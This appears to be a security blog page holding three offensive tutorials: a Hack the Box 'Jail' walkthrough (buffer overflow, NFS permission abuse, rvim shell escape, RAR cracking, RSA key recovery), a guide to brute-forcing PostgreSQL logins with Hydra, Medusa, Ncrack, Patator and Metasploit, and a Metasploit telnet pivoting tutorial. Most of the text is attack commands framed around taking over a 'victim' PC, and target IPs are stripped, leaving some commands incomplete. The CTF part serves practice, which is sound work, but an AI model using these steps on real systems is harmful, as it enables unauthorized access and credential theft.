Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Hack the Box Challenge: Jail Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Jail” which is available online for those who want to increase their skill in penetration testing and black box testing. Jail is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is so let’s begin with nmap port enumeration.
nmap -sV –p- --open
From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find an ascii art of prison cell on the webpage.

We run dirbuster on port 80, which reveals a directory entitled jailuser/, with a folder called dev/ inside the directory.

Inside the folder we see three files; a binary file, a c-program, and a bash script.

We open the c-program and find that it is a program for some kind of authentication. We also find that it uses strcpy function for the variable password.

We download the rest of the files, in the bash script there are just a few commands for a service called jail and by checking the jail binary we find that it is an ELF file.

Now we give the binary executable permissions and run the binary.

We check netstat and find that it opens up a port 7411. We check the nmap scan and find that port 7411 is open in the target machine.

Now we open the binary in gdb to look at the assembly code. The binary works by forking itself to each server call, so in the event of a crash the primary process will still run.  We use the command below in gdb to make the process debug in forked process.
gdb -q jail
(gdb)  set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) run

First we create a 50 bytes long string to find the EIP offset using patter_create script.
./pattern_create –l 50

Now we connect to the binary running on our system using netcat. We check the c program we found earlier to find the functions we need to use.
We know from the c-program that there is a strcpy function that copies the content of a variable called password to a variable called username. Now we use the pattern we created earlier and send it as password variable. We use the DEBUG function of the binary to get the address of the stack pointer.
nc localhost 7411
USER admin
PASS {pattern}

As soon as we pass the string we get a segmentation fault and find that the EIP register was overwritten with 0x62413961.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of28. So we need to write 28 characters and then write the address of the instructions we want to be executed.
./pattern_offset.rb  -q 62413961 -l 50

The off-set is 28 now we can proceed to create our python exploit using the available data to gain a shell. You can download the exploit used in the machine from here. After running the exploit we get a shell as user “nobody”.

Now for privilege escalation, we know that the machine is running NFS share we try to exploit it. We first find the shared folders of the target machine.
showmount -e

After finding the shared folders we mount them locally. After mounting the shared folder we find that only root user has read, write and execute permissions but a user with GID 1000 can write and execute files inside the folder.

So we create a user with GID 1000, so that we can upload our shell to exploit this weak permission vulnerability.

We login as user frank and create a c-program inside the shared folder that can set the real and effective user id to be 1000 of the calling the process.

Then we compile the program set the suid bit, so that we can spawn a shell with EUID 1000.

Now we go back to our reverse shell and run the binary that we just created. As soon as we run binary we spawn a shell as user “frank”.

We spawn a TTY shell and take a look at the sudoers list. We find that we can open jail.c file in /var/www/html/jailuser with rvim as user adm with no password.
python -c “import pty;pty.spawn(‘/bin/bash’)”
sudo -l

Before running the command we find in the sudoers list, first we go to /home/frank directory and find a file called “user.txt”. We take a look at the content of the file and find our first flag.

Now we run the 2nd command we find in the sudoers list. Now we use rvim to spawn a shell, as rvim is running as user adm when we spawn a shell we will get a shell as user adm.

Inside adm’s home directory we find a hidden folder called “.keys”. We go inside the directory and find one rar file called “keys.rar”, and one text file called “note.txt”.

We take a look at the content of note.txt file and find a hint for a password that states that the password would be user Frank’s last name followed by 4 digits and a symbol.

Now when we try to look for hidden directories, we find another folder called “.local”, we go inside that directory and find a hidden file called “.frank”.

We open the file and find it that the content of the file is encrypted.

We use the site and find the decrypted text; it was related to someone escaping Alcatraz.

Now we want to send keys.rar file from the target machine to our system. We first convert the content of keys.rar to base64 enoding, so that there are no bad characters.

Now we recreate the file by decoding the string in our local system.

When we try to extract the rar file we are asked for a password.
unrar x keys.rar

Now from the earlier hint we try to google search “frank Alcatraz” and find that there was a guy called Frank Miller who escaped Alcatraz prison in 1962.

We know that there was a message from the administrator to frank that his password is his last name followed by 4 digits and 1 symbol. We use crunch to create a dictionary with this information, we assume the number to be 1962 as it was the year Frank Miller escaped and it fits the 4 digit number in his password.
crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
After creating a wordlist, we use rar2john utility to convert keys.rar into a format suitable for use with john the ripper.
rar2john keys.rar > jail

We find the password to “Morris1962!” after we ran john the ripper to find the password for the rar file using the word list we created using crunch.

Now we extract the file using the password we find earlier and find a public key.

We use rsactftool to convert the public key into private key so that we can use this to login through ssh. After getting the private key; we change the permission of the private key to read write for owner only. You can download the RsaCtfTool here.
python --publickey /root/ –private > /root/id_rsa

We use the ssh private key to login into the target machine; once we connected through ssh we were login as root user we check the content for home directory of root and find a file called “root.txt”. We check inside the file and find our second and final flag.
ssh -i id_rsa

6 Ways to Hack PostgresSQL Login

In this article, we will learn how to gain control over our victim's PC through 5432 Port use for Postgres service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Let’s starts!!

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, postgres, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt postgres

-L: denotes path for username list
-P:  denotes path for password list
Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.


This is the graphical version to apply dictionary attack via 5432 port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select postgres in box against Protocol option and give the port number 5432 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.
Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.


Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
Medusa  -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres

-U: denotes path for username list
-P:  denotes path for password list
As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.


Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 
Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt

-U: denotes path for username list
-P:  denotes path for password list
As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.


Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as POSTGRES, HTTP, SMB and etc.

patator pgsql_login host= user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.


This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Open Kali terminal type msfconsole
 Now type use auxiliary/scanner/postgres/postgres_login
msf exploit (scanner/postgres/postgres_login)>set rhosts (IP of Remote Host)
msf exploit (scanner/postgres/postgres_login)>set user_file  /root/Desktop/user.txt
msf exploit (scanner/postgres/postgres_login)>set userpass_file  /root/Desktop/pass.txt
msf exploit (scanner/postgres/postgres_login)>set stop_on_success true
msf exploit (scanner/postgres/postgres_login)> exploit

From given below image you can observe that we had successfully grabbed the POSTGRES username and password.

Telnet Pivoting through Meterpreter

In our previous tutorial we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.
From Offensive Security
Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (client): window operating system with two network interface

Target Machine: Ubuntu server (Allow telnet service)

Exploit pivot machine
Use exploit MS17-010 or multi handler to hack the pivot machine.
From given image you can confirm that I owned pivot machine ( meterpreter session1.

Verify network interface of pivot

Check network interface through following command:
Meterpreter> ifconfig
From given image you can observe two networks interface in pivot’s system 1st for IP through which attacker is connected and 2nd for IP through which telnet server (targets) are connected.

Route Add

Since attacker belongs to interface and target belongs to interface therefore it is not possible to directly make attack on target network until unless the attacker acquires same network connection. In order to achieve network attacker need run the post exploitation “autoroute”.
use post/multi/manage/autoroute 
msf post(autoroute) > set session 1
msf post(autoroute) > exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.
use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts
msf post(arp_scanner) > set session 1
msf post(arp_scanner) > set thread 20
msf post(arp_scanner) > exploit
 Here we found a new IP as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 23
msf auxiliary(tcp) > set rhosts
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit
From given you can observe port 23 is open and we know that port 23 is used for telnet service.

Use Telnet login Brute Force Attack
An attacker always tries to make brute force attack for stealing credential for unauthorized access.
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Now type following command to Brute force TELNET login:
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > exploit
From given image you can observe that TELNET server is not secure against brute force attack because it is showing matching combination of username: aarti and password: 123 for login simultaneously it has opened victims command shell as session 2

Let’s count the number of victim sessions we have hold using following command:
From given image you can observe there are two sessions 1st as meterpreter session of windows system and 2nd as command shell of telnet server.

sessions 2
Now attacker is command shell of server, let’s verify through network configuration.
From given you can observe the network IP is